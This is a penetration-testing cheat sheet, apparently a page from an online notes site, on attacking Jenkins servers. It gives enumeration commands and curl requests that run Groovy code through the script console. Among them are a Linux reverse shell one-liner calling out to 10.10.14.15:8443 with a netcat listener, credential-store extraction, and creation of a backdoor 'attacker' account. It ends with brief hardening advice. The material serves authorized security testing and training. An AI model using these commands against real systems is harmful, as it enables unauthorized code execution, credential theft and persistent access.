10.-Attacking-jenkins

1. Jenkins Version Detection

  • HTTP Headers:

    curl -I http://target:8080/

  • Nmap Version Detection:

    nmap -sV -p 8080 <target_ip>

  • Jenkins CLI Detection:

    curl http://target:8080/jenkins/cli/ | grep -i "Jenkins CLI"

2. Jenkins Port Enumeration

  • Default HTTP: 8080

  • Slave Communication: 5000

    nmap -sV -p 8080,5000 <target_ip>

3. Jenkins CLI Enumeration

  • Help:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ help

  • List Plugins:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-plugins

  • List Jobs:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-jobs

    • Enumerate jobs, plugins, users.

4. Jenkins Plugin Enumeration

  • List Installed Plugins:

    curl http://target:8080/jenkins/pluginManager/

    • Common vulnerability source.

    • Vulnerability Search: Inspect plugin names, search for CVEs on NVD/Exploit-DB.

    • Example: Pipeline: Groovy plugin (CVE-2019-10352) allows arbitrary code execution.

    • Exploitation Methods: Research specific plugin CVEs and exploitation methods.

5. Jenkins Security Realm Enumeration

  • Check Authentication Methods:

    curl http://target:8080/jenkins/configureSecurity/

    • Jenkins DB, LDAP, etc.

6. Jenkins API Enumeration

  • API Endpoints:

    curl http://target:8080/jenkins/api/
curl http://target:8080/jenkins/api/json

  • API Token Enumeration:

    • Check for exposed tokens in API responses or configuration files.

    • Use API tokens for unauthorized access.

    • Enumerate API endpoints for sensitive data using tools like curl or python's request library.

  • API Endpoint Vulnerabilities:

    • Test API endpoints for vulnerabilities (fuzzing, parameter manipulation).

    • Check for endpoints allowing command injection or file read.

7. Jenkins Access Control Enumeration

  • Access Control Settings:

    curl http://target:8080/jenkins/configureSecurity/

8. Exploiting Jenkins Script Console

  • Remote Command Execution:

    curl -X POST -u admin:password --data-urlencode "script=println('Exploit successful')" http://target:8080/jenkins/scriptText

  • Groovy Command Execution (Linux):

    curl -X POST -d "script=println 'id'.execute()" http://target:8080/jenkins/scriptText

  • Groovy Command Execution (Windows):

    curl -X POST -d "script=def cmd = 'cmd.exe /c dir'.execute(); println cmd.text" http://target:8080/jenkins/scriptText

  • Reverse Shell via Groovy (Linux):

    curl -X POST -d "script=r = Runtime.getRuntime(); p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[]); p.waitFor()" http://target:8080/jenkins/scriptText
nc -lvnp 8443

9. Exploiting Build Job Misconfigurations

  • Create Malicious Job:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ create-job exploit_job < exploit.xml

10. Exploiting Pipeline Misconfigurations

  • Inject Malicious Groovy Script:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ build exploit_pipeline

11. Extracting Credentials from Jenkins

  • Extract Stored Credentials:

    curl -u admin:password http://target:8080/jenkins/credentials/store/system/domain/_/

12. Persistence and Post-Exploitation

  • Create Backdoor User:

    curl -X POST -u admin:password --data-urlencode "script=jenkins.model.Jenkins.instance.securityRealm.createAccount('attacker', 'password')" http://target:8080/jenkins/scriptText

13. Unauthenticated Exploits (Public Jenkins)

  • Check for Anonymous Access:

    curl http://target:8080/jenkins/

14. Pipeline Script Injection (Groovy RCE)

def cmd = "whoami".execute()
println cmd.text

15. Jenkins Slave Exploitation

  • Misconfigured Slave Nodes:

    • Check for misconfigured slave nodes.

    • Insecure communication protocols, lack of access control.

    • Exploit misconfigured slaves to gain access to the Jenkins master.

16. Exploiting Misconfigured Webhooks

  • Webhook-Triggered Jobs:

    • Identify webhook-triggered jobs.

17. Jenkins SSRF & External Service Interaction

def url = "http://internal-service.local:8080"
def conn = url.toURL().openConnection()
println conn.getInputStream().text

18. Jenkins Reverse Shell via Build Step Manipulation

  • Modify Job Build Steps:

    • Modify job build steps for reverse shell.

19. Privilege Escalation via Misconfigured Agents

  • Elevated Privileges:

    • If Jenkins agents run with elevated privileges, execute commands as a higher-privileged user.

20. Arbitrary File Read via Plugin Vulnerabilities

  • Vulnerable Plugins:

    • Exploit vulnerable plugins like "Pipeline: Groovy" to read sensitive files.

Additional Exploitation Techniques

  • 21. CSRF Protection Bypass:

    • Jenkins has CSRF protection, but misconfigurations may allow bypassing.

    • Common bypass methods: Referer header manipulation, token manipulation.

  • 22. Authentication Bypass Details:

    • Expand on authentication bypass vulnerabilities and exploits.

    • Check for anonymous access misconfigurations.

    • Path traversal, header manipulation, session hijacking, default credentials.

  • 23. Jenkins Security Hardening:

    • Keep Jenkins and plugins updated.

    • Restrict access to the script console.

    • Use strong authentication and RBAC.

    • Strong passwords, MFA, network segmentation, regular security audits, principle of least privilege.

Previous2. Servlet Containers and Software DevelopmentNext7.-Tomcat-discovery-and-enumeration

Last updated